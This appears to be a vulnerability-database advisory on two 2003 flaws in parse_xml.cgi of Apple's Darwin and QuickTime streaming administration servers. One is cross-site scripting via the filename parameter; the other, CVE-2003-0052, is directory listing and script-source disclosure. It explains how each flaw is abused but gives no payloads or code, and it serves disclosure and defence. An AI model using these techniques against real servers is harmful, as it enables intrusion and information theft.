Cross-site scripting (XSS) vulnerability in parse_xml.cgi in Apple Darwin Streaming Administration Server 4.1.2 and QuickTime Streaming Server 4.1.1 allows remote attackers to insert arbitrary script via the filename parameter, which is inserted into an error message. When an invalid filename is specified, it is output to an error page without sufficient sanitization of HTML and script code. This may permit cross-site scripting attacks if an attacker constructs a malicious link to the page and entices web users to visit it. The Apple Darwin and QuickTime streaming administration server is a web-based service that allows administrators to manage Darwin and QuickTime streaming servers. By default, these services listen on port 1220/TCP with root privileges. parse_xml.cgi does not sufficiently filter the filename parameter when the named file does not exist: if an attacker passes a non-existent file name, the script generates and records an error message containing it, and if the parameter contains malicious script code, that script is executed in the browser of the administrator who views the page
VAR-200303-0099 CVE-2003-0052 Apple Quicktime/Darwin Streaming server parse_xml.cgi Directory list vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
parse_xml.cgi in Apple Darwin Streaming Administration Server 4.1.2 and QuickTime Streaming Server 4.1.1 allows remote attackers to list arbitrary directories. This may lead to disclosure of sensitive information which may aid in further attacks against the system hosting the software. The attacker may need to view the source code of the page to see the directory listing output. By default, these services listen on port 1220/TCP with root privileges. parse_xml.cgi does not adequately filter user-submitted input. The Darwin streaming administration server relies on the parse_xml.cgi program, written in Perl, to authenticate and interact with users. Because the program uses the open() function incorrectly, an attacker can make it open directory nodes on UNIX systems, resulting in information leakage; the same flaw also allows an attacker to view the source code of the web scripts